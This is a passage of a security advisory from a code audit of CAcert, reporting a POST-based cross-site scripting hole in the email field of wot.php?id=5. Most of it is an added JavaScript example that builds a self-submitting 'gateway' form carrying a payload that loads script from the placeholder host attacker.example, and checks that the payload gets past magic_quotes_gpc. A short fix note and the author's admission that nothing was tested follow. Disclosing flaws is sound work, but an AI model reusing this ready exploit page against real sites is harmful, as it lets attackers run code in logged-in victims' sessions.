https://www.cacert.org/wot.php?id=5 multiple POST[email] XSS

This is part of a code audit on cacert sources. Francesco 'ascii' Ongaro - www.ush.it

HTML POC

>>> POST XSS and external source load POC <<<
I'm a gateway page, as used in post xss attacks. Click send to trigger the event.
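The POC's own HTML did not survive on this page, so the following is an added example, not the advisory's original file, of how such a POST-XSS gateway page is built. The target URL and the `email` parameter come from the advisory; the script host `attacker.example`, the quote-free payload and the helper names are assumptions made here. The block also emulates magic_quotes_gpc (PHP's addslashes on every GET/POST/COOKIE value) to show why an unquoted `<script src=...>` payload is the one that survives the escaping noted in the summary, while a payload with quotes is mangled.

```javascript
// Added example (not the advisory's POC): a self-submitting "gateway" page for
// a POST-reflected parameter, plus a magic_quotes_gpc emulation to pre-check
// the payload. Target and parameter name are from the advisory; the payload
// and the host attacker.example are placeholders, not values from the page.

const TARGET = 'https://www.cacert.org/wot.php?id=5';   // from the advisory
const PARAM = 'email';                                   // POST[email], from the advisory
// Assumed payload: no ' or " anywhere, so addslashes() cannot touch it, and the
// real code is fetched from an external host (the "external source load" POC).
const PAYLOAD = '<script src=//attacker.example/x.js></script>';

// Emulates PHP addslashes(): magic_quotes_gpc prefixes ' " \ and NUL with a
// backslash before the script ever sees the value. Everything else is untouched.
function magicQuotesGpc(value) {
  return value.replace(/[\\'"\0]/g, (c) => (c === '\0' ? '\\0' : '\\' + c));
}

// True when the payload passes through magic_quotes_gpc unchanged, i.e. it
// contains none of the characters addslashes() escapes.
function survivesMagicQuotes(payload) {
  return magicQuotesGpc(payload) === payload;
}

// Entity-encode the payload for an HTML attribute. The browser decodes the
// entities before submitting, so the raw payload is what gets POSTed.
function escapeHtmlAttr(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Renders the gateway page. A GET XSS can be delivered as a link; a POST XSS
// needs a form, so the victim (already logged in with the required role, as the
// summary notes) opens this page and the form posts the payload to the target,
// where it is reflected and executes in the target's origin.
function buildGatewayPage(targetUrl, paramName, payload, autoSubmit = true) {
  const submit = autoSubmit ? '<script>document.forms[0].submit()</script>' : '';
  return [
    '<!DOCTYPE html>',
    '<html><body>',
    "<p>I'm a gateway page, as used in POST XSS attacks. Click send to trigger the event.</p>",
    `<form method="post" action="${escapeHtmlAttr(targetUrl)}">`,
    `<input type="hidden" name="${escapeHtmlAttr(paramName)}" value="${escapeHtmlAttr(payload)}">`,
    '<input type="submit" value="send">',
    '</form>',
    submit,
    '</body></html>',
  ].join('\n');
}

// Refuse to emit a page whose payload would be mangled by magic_quotes_gpc.
if (!survivesMagicQuotes(PAYLOAD)) {
  throw new Error('payload contains characters addslashes() would escape');
}
const GATEWAY_HTML = buildGatewayPage(TARGET, PARAM, PAYLOAD);
console.log(GATEWAY_HTML);
```

Save the printed HTML to a file and open it in a browser that holds a session with the required role to reproduce the POST. Note that magic_quotes_gpc only adds backslashes before quote characters; it is not an output-encoding step, which is why the correct fix in the reflecting code is to HTML-encode the `email` value (htmlspecialchars in PHP) before echoing it, regardless of the magic quotes setting.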

Fast check

ND, I don't have the required access level and I'm too lazy to set up a test environment : )

Vulnerable code

./pages/wot/5.php

Summary

- POST XSS - magic_quotes_gpc ON - affected by user role (only logged in and with the right permissions)